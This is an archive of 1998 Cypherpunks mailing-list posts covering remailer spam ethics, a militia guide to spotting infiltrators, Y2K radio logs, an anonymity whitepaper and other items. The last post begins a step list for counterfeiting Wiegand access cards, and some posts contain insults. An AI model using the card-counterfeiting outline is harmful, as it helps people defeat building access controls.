complaints, and rightly so. The site it originates from will also get
flooded. Assuming FIJA is still online a few hours later, they will
probably wind up on spam block lists.

If you spam through anonymous remailers, they'll wind up on spam
blocking lists all over the place. If you falsify an origin address, 
it will also get flooded with complaints. Even mentioning FIJA is 
going to get them flooded with complaints.

You also make the mistake of assuming that most people read spam. They
don't. It just annoys them.

If you spam through anonymous remailers, you further the theories of
some people that they are simply abuse havens. This is not a positive
thing for the remailers. The Cypherpunks are associated with the
remailers, so it isn't a positive thing for us either, even though
we'll only be implicated several steps down. 

>>After all, the ends always justify the means. When the USG wants to storm
>>your home with a squad of ninjas, that's okay, so long as they're checking
>>for drugs or other evil things. Since it will keep us all safe, let's
>>eliminate privacy rights.
>
>Alls fair in love and war.

If such tactics are fair, then why are we worrying about distributing
FIJA literature? The government has our best interests at heart, after
all. Whatever.

>>The idea of spamming for "educational purposes" is the most obscene and
>
>The sheeple who haven't figured out how to filter spam are the ones
>most in need of education.  Do it for the children.  For the future
>generations.

The best thing to do "for the children" is to kick the clueless masses
off the Internet and turn it back into the academic area it used to
be. Good has come out of the commercialization of the Internet, but by
no means does it outweigh the bad.

The best thing to do "for future generations" is to revoke the voting
rights of welfare maggots. I don't see it happening very soon.

>The only thing evil needs to succeed is for good to do nothing.

Or for good to use the means of the evil to express their good ideas,
in the process becoming the very thing they are fighting against.

>Or just carry on with the same old same old, if that's what makes you feel
>better.  Best not to make waves, after all.  Might scare the horses.

Make a web site. Put it in your signature. Have others put it in their
signatures. Have people link to it from their pages. Advertise in
*appropriate* forums in appropriate manners.

It's threads like this that make me wonder what it really means to be
a Cypherpunk today. If the Cypherpunks (in the democratic sense)
actually support this, it is a sad day indeed.

As far as I'm concerned, go ahead and spam. You'll probably make FIJA
look like idiots, get some anonymous remailer sites shut down if you
spam through them, screw over any site even remotely mentioned in the
spam, get us blasted all over the abuse forums because it has been
discussed here recently, and accomplish the exact opposite of our 
goals. But go ahead if that's what makes you feel better. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Sat, 26 Dec 1998 21:41:56 +0800
To: cypherpunks@cyberpass.net
Subject: How to Spot a Government Infiltrator
Message-ID: <19981226132002.19035.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



How to Spot a Government Infiltrator 

                              by Mike Johnson

Those who have been studying the stories released to the media these days about the arrests of
various different people within the militia movement will doubtlessly have noted that government
infiltrators are usually involved. This should make people nervous. 

And rightly so. Our normal view of government is that the only people who should have to worry
about what the government is up to are people who are breaking the law. As the vast majority of
constitutional militia units are composed of people who are of good character and don't go around
breaking the law to begin with, they might feel that they should have little to worry about from the
government. 

Unfortunately that does not seem to be the case. The government appears to be going all out to
discredit the constitutional militia movement in this country. This effort on the part of the government
does include the use of government agents to infiltrate militia units and cause as many problems, hate
and discontent as they possibly can. In many instances, these government agents may not be readily
apparent as to who and what they are. Some of these people may have had extensive experience in
working undercover operations and may not make some of the more stupid mistakes. 

There are a variety of different roles that such government operatives may play. The first is that they
may simply act as a mole. They will do everything anybody else in the unit does, and do nothing at all
to call undue attention to themselves. However, they will relay everything that goes on within the unit
to their handlers. About the only indication a unit may have that they have been infiltrated by a mole
may be that they can't seem to be able to keep anything a secret. This type of role is the most difficult
for a unit to detect and deal with. Which is also possibly why most of the spy novels that get written
deal with various different ways to smoke out moles. While I wouldn't suggest that anybody try a
technique for which the only source of documentation is a work of fiction, it is an indication of just
how obnoxious this type of agent could be to deal with. 

Another role that a government agent might play may be that of a dissipator. A dissipator is one who
tries to redirect the course and energy of a unit in ways which will cause it to accomplish nothing of
any importance. They may also act so as to break a unit up by emphasizing differences,
disagreements and personality clashes between unit members. Given that the people who are
attracted to the constitutionalist militia movement usually tend to be strong willed and opinionated
people to begin with, such an agent may find that his task is somewhat easier than it might be if he
were working with other groups. Unit members should simply be encouraged not to take things
personally, be aware that there will be honest differences of opinion between the members of the unit,
and to be wary of somebody who does try to take everything personally, or set up cliques within the
unit. 

The final role which will be discussed is that of the agent provocateur. Such an agent infiltrates a unit
and tries to get the members of the unit to actually commit crimes, or make it look like they are
actually planning to commit crimes. One should also bear in mind that a government agent is not going
to be confined to operating within any one of the roles that have been discussed, and may likely mix
and match as they feel best. However, the role that has received the highest profile in government
operations these days is that of the agent provocateur. That is largely because the results of an
operation conducted by an agent provocateur or two make for good propaganda when the media
gets hold of it. The resultant publicity given to the arrests and the charges gets used to brand
everybody in the entire movement as a criminal. The fact that the entire thing was set up by someone
in the employ of the government isn't going to be mentioned at all by the mainstream media. 

For those who haven't caught on by now, your antenna should start to quiver in the presence of any
one, or especially a combination of the following behaviors/patterns demonstrated by a unit member: 

     (1) Wants to make bombs.
     (2) Wants to get everybody else to make bombs.
     (3) Wants people to buy/store large quantities of substances which could be used for
     explosives manufacture.
     (4) Fanatic about obtaining fully automatic weapons, without benefit of Class III
     license.
     (5) No obvious means of support, especially if they have lots of money to throw
     around.
     (6) Auto license tag changed on an irregular basis.
     (7) Encourages people to plan/do stupid things (raid armories, blow up office buildings,
     etc.)
     (8) Some groups can get auto tags run. They should be especially suspicious of
     anybody whose auto tag turns up a complete blank when run. (9) In our case, the guy
     was absolutely paranoid about his car being out of either his sight or his "wife's" sight for
     even a trivial amount of time.
     (10) Person claims to have a military background that they do not have. One individual
     claimed to be former Special Forces, but was found to be ignorant of some of the things
     that he should have known when quizzed by people who were former Special Forces.
     Depending on the level of trust that the members of your group have with each other, it
     might be a good idea to request to see the DD-214s of anybody claiming to have a
     military background.
     (11) One of your members has taken effective action to expose or block activities of
     the police or government preventing the expansion of or preservation of government
     power to control people and/or invade the privacy of the people.
     (12) One of your members (a) has an FFL; or (b) is involved in selling at gun shows; or
     (c) Is involved in promoting gun shows. 

Arguably the best way to deal with people who meet criteria 1-10 is simply to invite them to leave
the unit. As Starr and McCranie found out, trying to turn them in will do no good at all, so the next
best bet is to try to get them to leave. Failing that, disband unit, start again from scratch with people
you can trust after sufficient elapsed time. Given the way things are going right now, those who have
not joined up with public units may want to consider forming small closed units with just a small group
of people that they have known for a long time and that they trust. 

For persons in 11, and 12: Do your best to be sure the goons cannot find a pretext as that is what
they often work from. 

(*) Bill Albert of the Michigan Militia contributed to the list of items to look for and the discussion
which follows it. 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Baskind <jbaskind@home.com>
Date: Sun, 27 Dec 1998 06:05:47 +0800
To: sw-mod-ssl@engelschall.com
Subject: Re: Membership (One user says:)
In-Reply-To: <199812261452.JAA16580@devsys.jaguNET.com>
Message-ID: <v04102f00b2aafae8e569@[24.113.3.96]>
MIME-Version: 1.0
Content-Type: text/plain



[long and acrimonious discussion, at present ending with this message, clipped]

> Let's recall that once this ``situation'' is resolved, the list of
> volunteer members/coders will likely increase. Many, I'm sure, myself
> included, have held back.


I am following this discussion with some alarm, and I am sure that many 
others who rely on everyone involved in this acrimony to keep our sites 
running are too.  I think competition is very important, and the sort of 
internal competition you lot are involved in is crucial to the continued 
speedy evolution of the critical software you are making ( for us users, 
please be reminded).

Those who rely on your skills and expertise--in other words, the vast 
majority of Apache users, which means, apparently, some 50% of the active 
Web at this point, NEED you, all of you, as a group. to continue to share 
your brains and their collective product, with us. Because the vast 
majority of us couldn't do what you do if our lives depended on it.

I use mod_ssl, purely because it seemed easier to install and compile than 
Apache_SSL, and I really like Ralf's installation notes, not because I 
formed any judgement about the relative excellence of mod_ssl over 
Apache_SSL. I am not capable of making that judgement--I rely on YOUR 
assessments!

I really don't care if it actually is easier to install or not; --from my 
point of view, I honor Tim Hudson and Ben Laurie, Ralf Engelschall  and all 
the less public members of the Apache Group equally. Each of you 
contributes in a different way to make my life, and therefore livelihood, 
simpler and more pleasant.

Part of my skill set is political consulting--if there's anything I've 
learned, it is that mud not only sticks to both the flinger and flingee, 
but also clouds all the subsequent issues between both parties to a 
remarkably large degree.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Sat, 26 Dec 1998 21:48:17 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <19981226133009.1692.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain



<http://www2.clinet.fi/~msihvo/files/crossbows.html>

"If you don't learn how to beat your plowshares into swords
before they outlaw swords, then you sure as HELL ought to learn 
before they outlaw plowshares too. "

--Chuck Hammill 


#!/usr/local/bin/perl -0777-- -export-a-crypto-system-sig -RC4-3-lines-PERL
@k=unpack('C*',pack('H*',shift));for(@t=@s=0..255){$y=($k[$_%@k]+$s[$x=$_
]+$y)%256;&S}$x=$y=0;for(unpack('C*',<>)){$x++;$y=($s[$x%=256]+$y)%256;
&S;print pack(C,$_^=$s[($s[$x]+$s[$y])%256])}sub S{@s[$x,$y]=@s[$y,$x]}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Sat, 26 Dec 1998 22:55:20 +0800
To: cypherpunks@cyberpass.net
Subject: Posse Comitatus
Message-ID: <19981226142005.14320.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



<http://www.oz.net/~veils/veilsv2n1/politics.html>

The Military's Growing Involvement In Domestic Law
                              Enforcement




For more than a century the U.S. military has been banned from involvement in routine domestic law
enforcement. This tradition of separating the role of national defense from domestic law enforcement
has it's origins in the Posse Comitatus Act of 1878. This law prohibits the army from being involved
in domestic arrests, or in searches and seizures. This ban was later extended to the other services. It
was passed in response to abuses committed by occupation troops in the South after the Civil War.

This long tradition, which has helped to insure liberty and democracy for Americans, was quietly
abandoned in 1989 when Congress and the Bush administration ordered the military into the "war on
drugs". Since then the Pentagon has spent more than $7 billion on counter-drug activities, using tens
of thousands of active duty and reserve personnel.

Active duty units are primarily used to monitor and patrol for drug smuggling activity using
sophisticated surveillance and communication systems. These units are assisted by thousands of
National Guard troops whose activities are not normally restrained by the Posse Comitatus
legislation. This allows them to perform routine police activities such as inspecting cargo, analyzing
intelligence, and translating wiretapped conversations.

The military's involvement in domestic policing activities has now been institutionalized and is being
coordinated in the Defense Department by the Joint Task Force Six (JTF-6).

Supporter of using the military in drug enforcement activities argue that drug use threatens the country
economically and socially. Some military commanders see counter-drug operations as providing
troops with useful training. While law enforcement officials see it as an opportunity to benefit from
sophisticated surveillance and communication systems that they wouldn't normally have access to.

Opponents of giving the military domestic law enforcement responsibilities and powers remind
supporter of the abuses by troops that originally lead to passage of the Posse Comitatus legislation.
They also point out that the military's involvement in drug enforcement efforts haven't had any
discernible impact on the availability of drugs in the United States; so why take the risk of losing our
liberties when we gain nothing in return.

People need to ask themselves where the movement to involve the military in domestic policing
activities is going to stop. Are Somalia, Hati, and Bosnia simply peacekeeping activities, or are they
being used to train U.S. troops for the near future when they will be patrolling the streets of the
United States as they now patrol Bosnia. 


#!/usr/local/bin/perl -0777-- -export-a-crypto-system-sig -RC4-3-lines-PERL
@k=unpack('C*',pack('H*',shift));for(@t=@s=0..255){$y=($k[$_%@k]+$s[$x=$_
]+$y)%256;&S}$x=$y=0;for(unpack('C*',<>)){$x++;$y=($s[$x%=256]+$y)%256;
&S;print pack(C,$_^=$s[($s[$x]+$s[$y])%256])}sub S{@s[$x,$y]=@s[$y,$x]}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@die.com>
Date: Sun, 27 Dec 1998 04:30:37 +0800
To: cypherpunks@toad.com
Subject: [g8hxe@zetnet.co.uk: [WUN] MAR: MILLENIUM BUG]
Message-ID: <19981226144702.A23871@die.com>
MIME-Version: 1.0
Content-Type: text/plain



----- Forwarded message from Keith Haywood <g8hxe@zetnet.co.uk> -----

Date: Sat, 26 Dec 1998 12:19:37 GMT
Cc: keith.haywood@icl.com

Hi all, I caught the following NAVTEX intercepts last night and
thought they may be of interest to others, all were received on 518KHz.
They are being repeated frequently be all the U/K stations and the 
Netherlands Coastguard, and similar messages are being broadcast by some 
of the Scandinavian stations.


--- log opened Fri Dec 25 1998 00:00:20 UTC ---


05:31:06 UTC ZCZC OB07
05:33:09 UTC PORTPATRICKRADIO

05:33:43 UTC ZCZC OA40
05:33:46 UTC NAVAREA ONE 533
05:33:48 UTC YEAR 2000 AND MILLENIUM BUG.
05:33:54 UTC 1ST JAN 1999 IS THE FIRST OF SEVERAL CRITICAL DATES THROUGH  
05:34:05 UTC 1999 AND 2000 WHEN SOME ELECTRONIC SYSTEMS MAY FAIL DUE 
TO 05:34:16 UTC THEIR INABILITY TO PROCESS THE DATE. SUCH SYSTEMS 
INCLUDE 05:34:27 UTC AUTOMATION AND SAFETY SYSTEMS WHOSE FAILURE MAY 
RESULT IN 05:34:38 UTC LOSS OF POWER, STEERING OR MALFUNCTIONING OF 
NAVIGATIONAL 
05:34:45 UTC OR COMMUNICATIONS EQUIPMENT.
05:34:50 UTC MASTERS ARE ADVISED TO CONSIDER CONTINGENCY PLANS IN 
05:34:56 UTC PREPARATION FOR POSSIBLE FAILURE, TAKING INTO ACCOUNT OF 
THE 05:35:07 UTC OPERATIONAL PROGRAMME OF THE SHIP.
05:35:09 UTC GUIDANCE ON THE RISKS AND PRECAUTIONARY ACTION, HAS BEEN 
05:35:20 UTC PUBLISHED BY THE INTERNATIONAL MARITIME ORGANISATION AS 
05:35:31 UTC MSC/CIRC.868, 'ADDRESSING THE YEAR 2000 PROBLEM', AND AS 
AS A 05:35:42 UTC CORRECTION TO ALL VOLUMES OF THE UKHO ADMIRALTY 
LIST OF RADIO SIGNALS.
05:35:49 UTC CANCEL THIS MESSAGE 012359Z JAN 99.
05:35:54 UTC NNNN  



07:52:24 UTC ZCZC PA47
07:52:36 UTC NETHERLANDS COASTGUARD
07:52:40 UTC NAVIGATIONALWARNING NR 47 250730UTC DEC
07:52:46 UTC EQUIPMENT FAILURE ONBOARD AND ASHORE
07:52:51 UTC DUE TO THE YEAR 2000 PROBLEM:
07:52:56 UTC SHIPPING SHOUZD BEWARE THAT ON THE
07:53:01 UTC FOLLOWING DATES PROBLEMS MAY OCCUR
07:53:06 UTC ONBOARD IN ENGINES, MACHINERY, CONTROL
07:53:12 UTC AND MONITORING, COMPUTER, NAVIGATION
07:53:18 UTC AND COMMUNICATION EQUIPMENT,
07:53:22 UTC DETECTION, ALARM AND OTHER SYSTEMS.
07:53:28 UTC SIMILAR PROBLEMS MAY OCCUR ASHORE
07:53:33 UTC AND MIGHT HAMPER NAVIGATION AND
07:53:38 UTC COMMUNICATION POSSIBILITIES
07:53:42 UTC FOR SHIPPING. DATES:
07:53:45 UTC 01-01-1999 , 09-09-1999
07:53:49 UTC 01-01-2000 , 29-02-2000, 01-03-2000
07:53:54 UTC 31-12-2000 , 01-01-2001, 01-03-2001
07:53:59 UTC SHIPPING IS URGENTLY ADVISED TO
07:54:04 UTC NAVIGATE WITH EXTREME CAUTION ON
07:54:09 UTC THE AFOREMENTIONED DATES AND TO
07:54:13 UTC TAKE NECESSARY PRECAUTIONS WHERR
07:54:18 UTC POSSIBLE.
07:54:20 UTC CANCEL THIS MESSAGE 012359UTC JAN 99
07:54:25 UTC NNNN

Keith Haywood
G8HXE
Manchester
U/K.




---
The Worldwide UTE News (WUN) mailing list. WUN is a non-profit,
dues-free club established in 1995 to share information on shortwave
utilities.  For more information: http://www.gem.net/~berri/wun/

----- End forwarded message -----

-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DOOM Anonymous Untraceable User <nobody@seclab.com>
Date: Sat, 26 Dec 1998 23:26:12 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199812261455.PAA21979@rogue.seclab.com>
MIME-Version: 1.0
Content-Type: text/plain



Internet is slowing China's efforts to maintain control

To eliminate political opposition by the China Democratic Party, Chinese
authorities are putting prominent dissidents on trial for "inciting the
overthrow of state power," but the Internet is making it difficult for them
to accomplish their goal.  The Washington, D.C.-based electronic magazine
VIP Reference is a widely-used news source and network for dissident
activities.  Boston University professor Merle Goldman says, "It was
relatively easy for the authorities to get rid of Democracy Walls in
Beijing and in other cities in 1979, but it is virtually impossible to close down
the use of the Internet as a means of political communication." 

(Washington Post 18 Dec 98)

<http://www.ifcss.org/ftp-pub/org/dck/>


#!/usr/local/bin/perl -0777-- -export-a-crypto-system-sig -RC4-3-lines-PERL
@k=unpack('C*',pack('H*',shift));for(@t=@s=0..255){$y=($k[$_%@k]+$s[$x=$_
]+$y)%256;&S}$x=$y=0;for(unpack('C*',<>)){$x++;$y=($s[$x%=256]+$y)%256;
&S;print pack(C,$_^=$s[($s[$x]+$s[$y])%256])}sub S{@s[$x,$y]=@s[$y,$x]}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Austin Hill" <austin@zks.net>
Date: Sun, 27 Dec 1998 07:30:41 +0800
To: <cryptography@c2.net>
Subject: Zero-Knowledge Freedom AnonymousIP Whitepaper
Message-ID: <001601be3121$6f64a060$1f01a8c0@notebook.zks.net>
MIME-Version: 1.0
Content-Type: text/plain



Zero-Knowledge has put up a draft of a whitepaper explaining the technical
details of it's coming Freedom Internet Privacy system.

The paper discusses the technical details of our AnonymousIP protocol and
our Pseudonymous E-mail System.

This is an early draft and comments/questions are appreciated.

People familiar with Mixmaster, PipeNet, Cypherpunk Remailers and Onion
Routing will find this whitepaper to address many of the same problems with
regards to Internet Anonymity & Privacy.

The paper is available at http://www.zks.net/products/whitepapers.asp

Thanks,

Austin

_________________________________________________________________________
Austin Hill                                   Zero-Knowledge Systems Inc.
President                                                Montreal, Quebec
Phone: 514.286.2636 Ext. 226                            Fax: 514.286.2755
E-mail: austin@zks.net                                 http://www.zks.net

             Zero Knowledge Systems Inc. - Nothing Personal

PGP Fingerprints
2.6.3i = 3F 42 A2 0D AF 78 20 ED  A2 BB AD BE 8B 40 5E 64
5.5.3i = 77 1E 62 21 B3 F0 EB C0  AA 6C 65 30 56 CA BA C4 94 26 EC 00
keys available at
http://www.nai.com/products/security/public_keys/pub_key_default.asp
_________________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@openpgp.net>
Date: Sun, 27 Dec 1998 08:34:00 +0800
To: Multiple recipients of list <cypherpunks@openpgp.net>
Subject: Car computer navigator forgets to mention ferry  (fwd)
Message-ID: <Pine.LNX.4.05.9812270854530.6284-100000@khercs.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain






--   Max Inux <maxinux@openpgp.net>  Hey Christy!!! KeyID 0x8907E9E5
Kinky Sex makes the world go round O R Strong crypto makes the world safe
       If crypto is outlawed only outlaws will have crypto
Fingerprint(Photo Also): 259D 59F7 D98C CD73 1ACD 54Ea 6C43 4877 8907 E9E5



---------- Forwarded message ----------
Date: Sat, 26 Dec 1998 12:35:20 -0800 (PST)
X-Loop: openpgp.net
From: William Knowles <erehwon@kizmiaz.dis.org>
To: DC-Stuff <dc-stuff@dis.org>, aaa-list@lists.netlink.co.uk
Subject: Car computer navigator forgets to mention ferry 

POTSDAM, Germany (AP) [12.26.98] - A German couple out for a
Christmas drive near Berlin ended up in a river - apparently 
because their luxury car's computer forgot to mention they 
had to wait for a ferry.
 
The 57-year-old driver and his passenger were not injured in 
the accident, police said Saturday.
 
Several companies sell computer navigators, some of which are 
attached to dashboards and serve as electronic road maps. Some 
offer traffic updates and Internet connections.

The German couple was out driving Friday night when they came 
to a ferry crossing at the Havel River in Caputh, six miles 
from Berlin.
 
That information, however, was never stored in the satellite
steered navigation system they were using, police said. The driver 
kept going straight in the dark, expecting a bridge, and ended up 
in the water.

River traffic was stopped for two hours while the car was fished 
out about 13 feet from the river bank.

``You can't always blindly rely on technology,'' a coast guard 
police officer said.


==
Some day, on the corporate balance sheet, there will be 
an entry which reads, "Information"; for in most cases 
the information is more valuable than the hardware which
processes it. -- Grace Murray Hopper
==
http://www.dis.org/erehwon/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Sun, 27 Dec 1998 14:05:43 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Locating radio receivers
In-Reply-To: <199801192155.NAA00465@comsec.com>
Message-ID: <v04003a00b297a9284a89@[24.1.50.17]>
MIME-Version: 1.0
Content-Type: text/plain



There has been quite a bit of discussion on the list of late regarding
covert radio communication. I've been doing some investigation and have
identified a promising low probablity of intercept technology for
terrestrial, ground-to-air and earth-to-satellite communication. I'd like
to assemble a small team to build and test a proof of concept. Anyone with
interest and skillsplease contact me?

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Sat, 26 Dec 1998 20:17:36 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: jury spam justifiable?
In-Reply-To: <199812260635.HAA02005@replay.com>
Message-ID: <3.0.5.32.19981226214451.03a76b80@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



There are so many comments from Anon on this thread,

It defeats whole purpose of Anon.

Fuck all you Anon Y. Mouses,,,, 

spineless bastards.

I don't trumpet my true name, but my identity is findable.

But you, you haven't the conviction to stand up and say...... anything.

Reeza!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 27 Dec 1998 13:00:50 +0800
To: cryptography@c2.net
Subject: Re: Zero-Knowledge Freedom AnonymousIP Whitepaper
Message-ID: <199812270425.FAA12203@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> Zero-Knowledge has put up a draft of a whitepaper explaining the technical
> details of it's coming Freedom Internet Privacy system.
> 
> The paper discusses the technical details of our AnonymousIP protocol and
> our Pseudonymous E-mail System.
> 
> This is an early draft and comments/questions are appreciated.

Have algorithms been chosen? If I understand right, letting different users use
different algos would make some users' messages look different from others
while bouncing around in the network. I don't think anyone even suspects
3DES and a KEA cognate would fail.

The "topologically close" tradeoff (i.e, a gain in performance for an
unmeasured loss in security) seems to be more exploit-bait than optimization;
it might be wiser not to enable this part of automatic route selection by
default unless/until its effects on security are investigated more thoroughly.
At least give me a while to make an attack on it. :)

> 
> People familiar with Mixmaster, PipeNet, Cypherpunk Remailers and Onion
> Routing will find this whitepaper to address many of the same problems with
> regards to Internet Anonymity & Privacy.
> 
> The paper is available at http://www.zks.net/products/whitepapers.asp
> 
> Thanks,
> 
> Austin
> 
> _________________________________________________________________________
> Austin Hill                                   Zero-Knowledge Systems Inc.
> President                                                Montreal, Quebec
> Phone: 514.286.2636 Ext. 226                            Fax: 514.286.2755
> E-mail: austin@zks.net                                 http://www.zks.net
> 
>              Zero Knowledge Systems Inc. - Nothing Personal
> 
> PGP Fingerprints
> 2.6.3i = 3F 42 A2 0D AF 78 20 ED  A2 BB AD BE 8B 40 5E 64
> 5.5.3i = 77 1E 62 21 B3 F0 EB C0  AA 6C 65 30 56 CA BA C4 94 26 EC 00
> keys available at
> http://www.nai.com/products/security/public_keys/pub_key_default.asp
> _________________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 29 Dec 1998 03:03:22 +0800
To: mac-crypto@vmeng.com, e$@vmeng.com
Subject: Friedman sings, part II.
Message-ID: <v04020a82b2ac32da3d17@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



http://www.booknotes.org/transcripts/10086.htm

This time it's for Brian Lamb's "Booknotes" show on CSPAN. The above is a
transcript, about 60k.

Cheers,
RAH
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Mon, 28 Dec 1998 07:55:49 +0800
To: jy@jya.com
Subject: David Angell and html
Message-ID: <3686BFF8.4A4F@nmol.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3999.1071713823.multipart/mixed"

--Boundary..3999.1071713823.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Sunday 12/27/98 4:13 PM

John Young

I went to http://www.page1book.com this morning looking for books on
HLML.

I asked the clerk what was a good book on html.  The clerk pointed
me to HTML 4 Unleashed, second edition, by Rick Darnell, et al.

A guy standing next to me volunteered that he wrote books on 
computing.

He advised getting a reference book, looking at examples on Internet,
RESEARCH the code, then modify the RESEARCHED the code.

He introduced himself.  David Angell.

  ISDN for Dummies (--For Dummies) ~ Usually ships in 2-3 days
  David Angell / Paperback / Published 1996 
  Our Price: $19.99 ~ You Save: $5.00 (20%) http://www.amazon.com

He was visiting his mother who lives in abq.

Angell now lives in Austin TOO.	

I am on the net to download THE [your?] code at
http://jya.com/crypto.htm.  
To RESEARCH it, of course.

I am experimenting with <BODY BACKGROUND="devil2.jpg"> for background
for Pro Se Litigation with the US Federal Government.
http://www.jya.com/nsasuit.txt

Keep a good sense of humor.  And up-wind too, of course.
http://www.zolatimes.com/v2.29/bw1.html 

I CONTINUE to recall Bob Serna's joke.

	Q  What is the difference between a terrorist  
           	and a woman with pms?  
  
  	A  You can negotiate with a terrorist.  
  
We got to get this UNFORTUNATE MATTER settled BEFORE IT GETS
WORSE!

Later
bill



Thursday 12/10/98 5:08 PM

J Kevin O'Brien, Chief
Freedom of Information-Privacy Act Section
Office of Public Affairs
U.S. Department of Justice
Federal Bureau of Investigation
Washington D. C. 20535

O'Brien

I received your form letter dated DEC 02 1998.

YES, I want the information!

I return your completed form.

Sandia assigned me to break electronic locks for the FBI/ERF.

SSA Mike Uttaro was my direct contact.  His boss was SSA Mike McDevitt.

The FBI is breaking the law under the veil of classification abuse.

I may write another article
---
False Security   
   
		        William H. Payne	   
                                      
  			Abstract   

Wiegand wire plastic credit card-sized entry access credentials are
the easiest to counterfeit.  Yet Access Control & SECURITY SYSTEMS 
INTEGRATION, September 1998 , www.prox.com  http/www.securitysolutions.com
 ran a full page ad.  
  
  "Why 130 million Wiegand cards are in use throughout the world .   
   
  The most secure of all access card technologies.   
   
  HID Wiegand cards are virtually impossible to counterfeit... any attempt to    
  alter them destroys them! ...   
   
  Since no direct contact with the card is required, they are totally enclosed,   
  making them absolutely immune to the elements and a frustration of   
  vandals. ...    
   
     	The secrets to the security of an   
  	HID Wiegand card are those little   
      	enclosed wire strips. Once corrupted,   
  	they won't work."   
  
Purpose of this article is to tell you how to counterfeit Wiegand 
http://www.securitysolutions.com/  and give you insight into Real Security. 
  
	Fumble, Bumble and Inept Funds Electronic Lock Breaking at   
	Sandia National Laboratories.   


http://www.jya.com/fbi-en7898.htm

			False Security   
   
		        William H. Payne	   
                                      
  			Abstract   

Wiegand wire plastic credit card-sized entry access credentials are
the easiest to counterfeit.  Yet Access Control & SECURITY SYSTEMS 
INTEGRATION, September 1998 , www.prox.com  http/www.securitysolutions.com
 ran a full page ad.  
  
  "Why 130 million Wiegand cards are in use throughout the world .   
   
  The most secure of all access card technologies.   
   
  HID Wiegand cards are virtually impossible to counterfeit... any attempt to    
  alter them destroys them! ...   
   
  Since no direct contact with the card is required, they are totally enclosed,   
  making them absolutely immune to the elements and a frustration of   
  vandals. ...    
   
     	The secrets to the security of an   
  	HID Wiegand card are those little   
      	enclosed wire strips. Once corrupted,   
  	they won't work."   
  
Purpose of this article is to tell you how to counterfeit Wiegand 
http://www.securitysolutions.com/  and give you insight into Real Security. 
  
	Fumble, Bumble and Inept Funds Electronic Lock Breaking at   
	Sandia National Laboratories.   


http://www.jya.com/fbi-en7898.htm
---
Counterfeiting Wiegand Wire Access Credentials
     
                                   Bill Payne
     
                                 October 16,1996
     
                                    Abstract
     
                  Wiegand wire access credentials are easy and
                  inexpensive to counterfeit.
     
        Access Control & Security Systems Integration magazine, October
        1996 [http://www/securitysolutions.com] published the article,
     
             Wiegand technology stands the test of time
     
             by PAUL J. BODELL, page 12
     
             Many card and reader manufacturers offer Wiegand (pronounced
             wee-gand) output.  However, only three companies in the
             world make Wiegand readers.  Sensor Engineering of Hamden
             Conn., holds the patent for Wiegand, and Sensor has licensed
             Cardkey of Simi Valley, Calif., and Doduco of Pforzheim,
             Germany, to manufacture Wiegand cards and readers. ...  A
             Wiegand output reader is not the same thing as a Wiegand
             reader,  and it is important to understand the differences.
     
                In brief, Wiegand reader use the Wiegand effect to
             translate card information around the patented Wiegand
             effect in which a segment of a specially treated wire
             generates an electronic pulse when subjected to a specific
             magnetic field.  If the pulse is generated when the wire is
             near a pick-up coil, the pulse can be detected by a circuit.
             Lining up several rows of wires and passing them by a cold
             would generate a series of pulses.  Lining up two rows of
             wires - calling on row "zero bits" and the other "one bits"
             - and passing them by two different coils would generate two
             series of pulses, or data bits.  These data bits can then be
             interpreted as binary data and used to control other
             devices.  If you seal the coils in a rugged housing with
             properly placed magnets, and LED and some simple circuitry,
             you have a Wiegand reader.  Carefully laminate the special
             wires in vinyl, and artwork, and hot-stamp a number on the
             vinyl, and you have a Wiegand card.
     
             IN THE BEGINNING
     
               Wiegand was first to introduce to the access control
             market in the late 1970s.  It was immediately successful
             because it filled the need for durable, secure card and
             reader technology.
               Embedded in the cards, Wiegand wires cannot be altered or
             duplicated. ...
     
        Bodell's Last statement is incorrect.
     
        Tasks for EASILY counterfeiting Wiegand wire cards are
     
        1    Locate the wires inside the card to read the 0s and 1s.
     
